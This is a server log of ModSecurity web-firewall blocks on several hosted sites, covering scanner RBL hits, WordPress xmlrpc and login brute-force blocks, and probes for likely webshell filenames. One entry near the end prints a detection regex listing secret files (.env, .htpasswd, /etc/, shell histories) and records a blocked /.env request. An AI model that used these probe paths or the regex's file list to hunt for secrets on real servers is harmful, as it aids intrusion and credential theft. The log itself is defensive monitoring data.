[Tue May 26 19:26:11.381461 2026] [security2:error] [pid 49598:tid 49829] [client 213.35.106.232:56576] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 232.106.35.213.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.aastha-enterprises.onesoft.in"] [uri "/wp-includes/functions.php"] [unique_id "ahWme-zJzkdc0WtdrwtMuAAAAOo"]
[Tue May 26 19:26:11.906160 2026] [security2:error] [pid 49598:tid 49732] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWme-zJzkdc0WtdrwtMuwAAAIk"]
[Tue May 26 19:26:11.958209 2026] [security2:error] [pid 49598:tid 49813] [client 91.245.236.124:63841] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWme-zJzkdc0WtdrwtM1wAAANo"]
[Tue May 26 19:26:11.958334 2026] [security2:error] [pid 49598:tid 49813] [client 91.245.236.124:63841] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWme-zJzkdc0WtdrwtM1wAAANo"]
[Tue May 26 19:26:12.129783 2026] [security2:error] [pid 49598:tid 49776] [client 20.192.3.167:5886] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/edit.php"] [unique_id "ahWmfOzJzkdc0WtdrwtM3wAAALU"]
[Tue May 26 19:26:12.271561 2026] [security2:error] [pid 49598:tid 49780] [client 136.118.33.158:52125] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 158.33.118.136.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "friendsalongtheway.net"] [uri "/xmlrpc.php"] [unique_id "ahWmfOzJzkdc0WtdrwtM2wAAALk"]
[Tue May 26 19:26:12.271687 2026] [security2:error] [pid 49598:tid 49780] [client 136.118.33.158:52125] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "friendsalongtheway.net"] [uri "/xmlrpc.php"] [unique_id "ahWmfOzJzkdc0WtdrwtM2wAAALk"]
[Tue May 26 19:26:12.715095 2026] [security2:error] [pid 49598:tid 49798] [client 213.35.106.232:56736] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 232.106.35.213.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.aastha-enterprises.onesoft.in"] [uri "/wp-includes/class-wp.php"] [unique_id "ahWmfOzJzkdc0WtdrwtNAQAAAMs"]
[Tue May 26 19:26:12.718343 2026] [security2:error] [pid 49598:tid 49772] [client 91.245.236.124:54441] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmfOzJzkdc0WtdrwtNAgAAALE"]
[Tue May 26 19:26:12.718430 2026] [security2:error] [pid 49598:tid 49772] [client 91.245.236.124:54441] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmfOzJzkdc0WtdrwtNAgAAALE"]
[Tue May 26 19:26:12.947687 2026] [security2:error] [pid 49598:tid 49817] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWmfOzJzkdc0WtdrwtM-wAAAN4"]
[Tue May 26 19:26:13.174171 2026] [security2:error] [pid 49598:tid 49797] [client 20.192.3.167:13257] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/f35.php"] [unique_id "ahWmfezJzkdc0WtdrwtNFQAAAMo"]
[Tue May 26 19:26:13.493457 2026] [security2:error] [pid 49598:tid 49811] [client 91.245.236.124:52311] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmfezJzkdc0WtdrwtNJQAAANg"]
[Tue May 26 19:26:13.493579 2026] [security2:error] [pid 49598:tid 49811] [client 91.245.236.124:52311] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmfezJzkdc0WtdrwtNJQAAANg"]
[Tue May 26 19:26:13.629857 2026] [security2:error] [pid 49598:tid 49839] [client 213.35.106.232:56975] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 232.106.35.213.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.aastha-enterprises.onesoft.in"] [uri "/wp-includes/option.php"] [unique_id "ahWmfezJzkdc0WtdrwtNKAAAAPQ"]
[Tue May 26 19:26:13.966547 2026] [security2:error] [pid 49598:tid 49676] [remote 49.13.171.11:54496] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 11.171.13.49.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWmfezJzkdc0WtdrwtNLQAAzU0"]
[Tue May 26 19:26:14.169427 2026] [security2:error] [pid 49598:tid 49670] [remote 49.13.171.11:54496] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 11.171.13.49.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWmfuzJzkdc0WtdrwtNRAAA_kc"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:26:14.190168 2026] [security2:error] [pid 49598:tid 49852] [client 20.192.3.167:8674] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/fff.php"] [unique_id "ahWmfuzJzkdc0WtdrwtNSAAAAQE"]
[Tue May 26 19:26:14.260157 2026] [security2:error] [pid 49598:tid 49805] [client 91.245.236.124:11197] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmfuzJzkdc0WtdrwtNSQAAANI"]
[Tue May 26 19:26:14.260273 2026] [security2:error] [pid 49598:tid 49805] [client 91.245.236.124:11197] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmfuzJzkdc0WtdrwtNSQAAANI"]
[Tue May 26 19:26:15.031439 2026] [security2:error] [pid 49598:tid 49835] [client 91.245.236.124:45671] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmf-zJzkdc0WtdrwtNZAAAAPA"]
[Tue May 26 19:26:15.031572 2026] [security2:error] [pid 49598:tid 49835] [client 91.245.236.124:45671] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmf-zJzkdc0WtdrwtNZAAAAPA"]
[Tue May 26 19:26:15.196215 2026] [security2:error] [pid 49598:tid 49761] [client 20.192.3.167:14299] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/ff1.php"] [unique_id "ahWmf-zJzkdc0WtdrwtNZQAAAKY"]
[Tue May 26 19:26:15.370465 2026] [security2:error] [pid 49598:tid 49791] [client 213.35.106.232:57231] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 232.106.35.213.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.aastha-enterprises.onesoft.in"] [uri "/wp-includes/post.php"] [unique_id "ahWmf-zJzkdc0WtdrwtNbAAAAMQ"]
[Tue May 26 19:26:15.799515 2026] [security2:error] [pid 49598:tid 49767] [client 91.245.236.124:57791] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmf-zJzkdc0WtdrwtNggAAAKw"]
[Tue May 26 19:26:15.799710 2026] [security2:error] [pid 49598:tid 49767] [client 91.245.236.124:57791] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmf-zJzkdc0WtdrwtNggAAAKw"]
[Tue May 26 19:26:16.095086 2026] [security2:error] [pid 49598:tid 49751] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWmf-zJzkdc0WtdrwtNewAAAJw"]
[Tue May 26 19:26:16.248798 2026] [security2:error] [pid 49598:tid 49814] [client 20.192.3.167:11616] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/flower.php"] [unique_id "ahWmgOzJzkdc0WtdrwtNkgAAANs"]
[Tue May 26 19:26:16.470045 2026] [security2:error] [pid 49598:tid 49846] [client 213.35.106.232:57502] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 232.106.35.213.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.aastha-enterprises.onesoft.in"] [uri "/wp-includes/user.php"] [unique_id "ahWmgOzJzkdc0WtdrwtNmQAAAPs"]
[Tue May 26 19:26:16.581067 2026] [security2:error] [pid 49598:tid 49803] [client 91.245.236.124:11651] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmgOzJzkdc0WtdrwtNmgAAANA"]
[Tue May 26 19:26:16.581186 2026] [security2:error] [pid 49598:tid 49803] [client 91.245.236.124:11651] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmgOzJzkdc0WtdrwtNmgAAANA"]
[Tue May 26 19:26:17.296685 2026] [security2:error] [pid 49598:tid 49827] [client 20.192.3.167:3610] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/file.php"] [unique_id "ahWmgezJzkdc0WtdrwtNugAAAOg"]
[Tue May 26 19:26:17.347529 2026] [security2:error] [pid 49598:tid 49826] [client 91.245.236.124:10219] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmgezJzkdc0WtdrwtNvAAAAOc"]
[Tue May 26 19:26:17.347660 2026] [security2:error] [pid 49598:tid 49826] [client 91.245.236.124:10219] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmgezJzkdc0WtdrwtNvAAAAOc"]
[Tue May 26 19:26:17.681456 2026] [security2:error] [pid 49598:tid 49817] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWmgezJzkdc0WtdrwtNuAAAAN4"]
[Tue May 26 19:26:18.127562 2026] [security2:error] [pid 49598:tid 49855] [client 91.245.236.124:57923] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmguzJzkdc0WtdrwtN2QAAAQQ"]
[Tue May 26 19:26:18.127682 2026] [security2:error] [pid 49598:tid 49855] [client 91.245.236.124:57923] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmguzJzkdc0WtdrwtN2QAAAQQ"]
[Tue May 26 19:26:18.440533 2026] [security2:error] [pid 49598:tid 49802] [client 20.192.3.167:8209] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/goods.php"] [unique_id "ahWmguzJzkdc0WtdrwtN6gAAAM8"]
[Tue May 26 19:26:18.891105 2026] [security2:error] [pid 49598:tid 49819] [client 91.245.236.124:24663] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmguzJzkdc0WtdrwtN_AAAAOA"]
[Tue May 26 19:26:18.891244 2026] [security2:error] [pid 49598:tid 49819] [client 91.245.236.124:24663] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmguzJzkdc0WtdrwtN_AAAAOA"]
[Tue May 26 19:26:19.392038 2026] [security2:error] [pid 49598:tid 49786] [client 20.192.3.167:8658] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/g.php"] [unique_id "ahWmg-zJzkdc0WtdrwtOFgAAAL8"]
[Tue May 26 19:26:19.655926 2026] [security2:error] [pid 49598:tid 49753] [client 91.245.236.124:41523] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmg-zJzkdc0WtdrwtOHgAAAJ4"]
[Tue May 26 19:26:19.656023 2026] [security2:error] [pid 49598:tid 49753] [client 91.245.236.124:41523] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmg-zJzkdc0WtdrwtOHgAAAJ4"]
[Tue May 26 19:26:19.925421 2026] [security2:error] [pid 49598:tid 49841] [client 222.252.196.85:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWmg-zJzkdc0WtdrwtOGQAAAPY"]
[Tue May 26 19:26:20.245500 2026] [security2:error] [pid 49598:tid 49820] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWmg-zJzkdc0WtdrwtOLgAAAOE"]
[Tue May 26 19:26:20.343355 2026] [security2:error] [pid 49598:tid 49752] [client 101.33.81.73:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "consultrgb.com"] [uri "/site/index.php"] [unique_id "ahWmg-zJzkdc0WtdrwtOMQAAAJ0"]
[Tue May 26 19:26:20.344397 2026] [security2:error] [pid 49598:tid 49772] [client 20.192.3.167:1167] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/hplfuns.php"] [unique_id "ahWmhOzJzkdc0WtdrwtOPQAAALE"]
[Tue May 26 19:26:20.907819 2026] [security2:error] [pid 49598:tid 49776] [client 91.245.236.124:60673] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmhOzJzkdc0WtdrwtOQQAAALU"]
[Tue May 26 19:26:20.907931 2026] [security2:error] [pid 49598:tid 49776] [client 91.245.236.124:60673] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmhOzJzkdc0WtdrwtOQQAAALU"]
[Tue May 26 19:26:21.297191 2026] [security2:error] [pid 49598:tid 49838] [client 20.192.3.167:12781] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/ioxi-o.php"] [unique_id "ahWmhezJzkdc0WtdrwtOYgAAAPM"]
[Tue May 26 19:26:21.672889 2026] [security2:error] [pid 49598:tid 49731] [client 91.245.236.124:47575] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmhezJzkdc0WtdrwtOdAAAAIg"]
[Tue May 26 19:26:21.673047 2026] [security2:error] [pid 49598:tid 49731] [client 91.245.236.124:47575] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmhezJzkdc0WtdrwtOdAAAAIg"]
[Tue May 26 19:26:21.756741 2026] [security2:error] [pid 49598:tid 49711] [remote 216.73.216.30:22862] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/crm"] [unique_id "ahWmhezJzkdc0WtdrwtOdQAA23A"]
[Tue May 26 19:26:22.239708 2026] [security2:error] [pid 49598:tid 49808] [client 20.192.3.167:10846] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/in.php"] [unique_id "ahWmhuzJzkdc0WtdrwtOjgAAANU"]
[Tue May 26 19:26:22.451705 2026] [security2:error] [pid 49598:tid 49732] [client 91.245.236.124:10903] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmhuzJzkdc0WtdrwtOmwAAAIk"]
[Tue May 26 19:26:22.451808 2026] [security2:error] [pid 49598:tid 49732] [client 91.245.236.124:10903] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmhuzJzkdc0WtdrwtOmwAAAIk"]
[Tue May 26 19:26:22.668920 2026] [security2:error] [pid 49598:tid 49798] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWmhuzJzkdc0WtdrwtOkQAAAMs"]
[Tue May 26 19:26:22.747291 2026] [security2:error] [pid 49598:tid 49714] [remote 212.227.60.37:35062] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 37.60.227.212.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWmhuzJzkdc0WtdrwtOnwAAu3M"]
[Tue May 26 19:26:22.945205 2026] [security2:error] [pid 49598:tid 49599] [remote 212.227.60.37:35062] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 37.60.227.212.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWmhuzJzkdc0WtdrwtOsgAAqQA"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:26:23.184824 2026] [security2:error] [pid 49598:tid 49757] [client 213.35.106.232:57684] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 232.106.35.213.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.aastha-enterprises.onesoft.in"] [uri "/wp-content/plugins/hello.php"] [unique_id "ahWmh-zJzkdc0WtdrwtOugAAAKI"]
[Tue May 26 19:26:23.196225 2026] [security2:error] [pid 49598:tid 49852] [client 20.192.3.167:12360] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/info.php"] [unique_id "ahWmh-zJzkdc0WtdrwtOuwAAAQE"]
[Tue May 26 19:26:23.228471 2026] [security2:error] [pid 49598:tid 49814] [client 91.245.236.124:20149] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmh-zJzkdc0WtdrwtOvAAAANs"]
[Tue May 26 19:26:23.228569 2026] [security2:error] [pid 49598:tid 49814] [client 91.245.236.124:20149] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmh-zJzkdc0WtdrwtOvAAAANs"]
[Tue May 26 19:26:23.281554 2026] [security2:error] [pid 49598:tid 49780] [client 176.65.139.237:36654] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "athelstan.org.in.svijaykumar.in"] [uri "/.env"] [unique_id "ahWmh-zJzkdc0WtdrwtOvQAAALk"]
[Tue May 26 19:26:24.006829 2026] [security2:error] [pid 49598:tid 49760] [client 91.245.236.124:38653] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmiOzJzkdc0WtdrwtO2QAAAKU"]
